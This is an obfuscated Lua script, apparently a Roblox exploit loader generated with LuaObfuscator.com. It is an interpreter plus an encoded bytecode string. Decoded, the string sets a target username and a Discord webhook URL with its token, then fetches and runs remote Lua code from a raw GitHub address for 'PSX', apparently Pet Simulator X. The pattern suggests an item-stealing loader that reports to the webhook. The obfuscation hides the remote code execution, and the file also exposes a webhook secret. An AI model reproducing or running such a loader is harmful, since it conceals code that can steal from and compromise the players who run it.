--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((1 + 1 + 0)^(v32-(1 + 0))))%((6 -4)^(((v33-(1 + 0)) -(v32-((1451 -(682 + 767)) -1))) + ((814 -406) -(295 + 112))));return v76-(v76%(2 -(1 + 0)));else local v77=(1 + 1)^(v32-(38 -(26 + 11)));return (((v31%(v77 + v77))>=v77) and (853 -(479 + 373))) or (1962 -(1723 + 239));end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + 2);v18=v18 + (5 -3);return (v40 * (1483 -(597 + 630))) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + 1 + 2);v18=v18 + (13 -9);return (v44 * 16777216) + (v43 * (47899 + 17637)) + (v42 * 256) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1284 -((2061 -(1241 + 741)) + 1204);local v48=(v20(v46,(471 + 1451) -(1333 + 588),24 -4) * ((2 + 0)^(67 -35))) + v45;local v49=v20(v46,14 + 7,73 -42);local v50=((v20(v46,17 + 15)==(1514 -(1501 + 12))) and  -(2 -1)) or (4 -(378 -(262 + 113)));if (v49==(0 + 0)) then if (v48==0) then return v50 * 0;else v49=1617 -(44 + 1572);v47=0 -0;end elseif (v49==(2549 -(197 + 305))) then return ((v48==(1130 -(1028 + 12 + 90))) and (v50 * (1/(0 -0)))) or (v50 * NaN);end return v8(v50,v49-(857 + 166)) * (v47 + (v48/(((1 + 3) -2)^(1854 -(492 + 1310)))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v34) -(1 + 0));v18=v18 + v34;local v52={};for v63=998 -(945 + 52), #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=333 -(182 + 150),v57 do local v66=v21();local v67;if (v66==1) then v67=v21()~=0;elseif (v66==(862 -(605 + 255))) then v67=v24();elseif (v66==(3 + 0)) then v67=v25();end v58[v65]=v67;end v56[60 -(15 + 42)]=v21();for v69=1,v23() do local v70=v21();if (v20(v70,1 + 0,1)~=(732 -(663 + 69))) then else local v83=v20(v70,2 + 0,3);local v84=v20(v70,4,6 + 0);local v85={v22(),v22(),nil,nil};if (v83==0) then v85[3]=v22();v85[4 + 0]=v22();elseif (v83==(1450 -(759 + 690))) then v85[3 + 0]=v23();elseif (v83==2) then v85[3]=v23() -((325 -(150 + 173))^(1231 -(256 + 959)));elseif (v83==(3 + 0)) then v85[3]=v23() -((1203 -(1001 + 200))^16);v85[4]=v22();end if (v20(v84,1,1)==1) then v85[2 + 0]=v58[v85[2]];end if (v20(v84,2,2)==(1 + 0)) then v85[5 -2]=v58[v85[1437 -(1130 + 304)]];end if (v20(v84,1325 -(394 + 928),2 + 1)~=1) then else v85[15 -11]=v58[v85[4]];end v53[v69]=v85;end end for v71=1 -0,v23() do v54[v71-(950 -(12 + 937))]=v28();end for v73=1,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=1104 -(22 + (1166 -(62 + 22))),v81 do if (((3228 -787)>(1875 -(551 + 703))) and (v107>=v90)) then v92[v107-v90]=v80[v107 + 1];else v94[v107]=v80[v107 + (1878 -(1446 + 431)) + 0];end end local v95=(v81-v90) + (1377 -(1353 + 23)) + 0;local v96;local v97;while true do v96=v88[v78];v97=v96[1 + 0];if (((3050 -919)<(3405 + 1467)) and (v97<=(6 -3))) then if ((449<=4140) and (v97<=(1 + 0))) then if ((v97==(325 -(76 + 249))) or ((2092 -(105 + 476))<(440 + 173))) then v94[v96[(51 -(30 + 19)) + 0]]=v96[3 + 0 + 0];else local v120=v96[1 + 1];local v121=v94[v96[1218 -(309 + 115 + 791)]];v94[v120 + (2 -1)]=v121;v94[v120]=v121[v96[263 -(17 + 242)]];end elseif (((58 + (862 -(341 + 426)))<=2412) and (v97>((4 -2) + 0))) then v94[v96[979 -(473 + 504)]]=v96[5 -(2 + 0)]~=(568 -(468 + 100));else v94[v96[2]]();end elseif (((643 + 7 + 2893)>=(2536 + 8)) and (v97<=5)) then if (((9064 -4969)==(3484 + 611)) and (v97==(1314 -(256 + 1054)))) then v94[v96[(2143 -1104) -(726 + 311)]]=v37[v96[3]];else local v128=v96[1 + 1];local v129,v130=v91(v94[v128](v13(v94,v128 + (551 -(113 + 437)),v96[730 -(278 + 449)])));v79=(v130 + v128) -1;local v131=0 + 0;for v134=v128,v79 do v131=v131 + 1 + 0;v94[v134]=v129[v131];end end elseif ((4082>=(1107 + 316)) and (v97<=(1063 -(997 + 60)))) then local v132=v96[3 -1];v94[v132]=v94[v132](v13(v94,v132 + (1 -(1426 -(1369 + 57))),v79));elseif (((4603 -1072)==(5269 -(1208 + 530))) and (v97>(1354 -(737 + 610)))) then v37[v96[3]]=v94[v96[21 -(14 + 5)]];else do return;end end v78=v78 + 1;end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D65030C3O004A616D616C5468654775793003073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313036373133323139313738353631393531362F6E486C414A646C5144485A654356624F324E476F55545166467741516F497A38512D7367344E52764A655851434F613577784C626A35676641354A41365A6B6141677975030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F4E65772E6C7561000D3O00124O00023O0012083O00013O00124O00043O0012083O00033O0012043O00053O001204000100063O00200100010001000700122O000300084O0003000400014O0005000100044O00065O00022O00023O000100012O00073O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
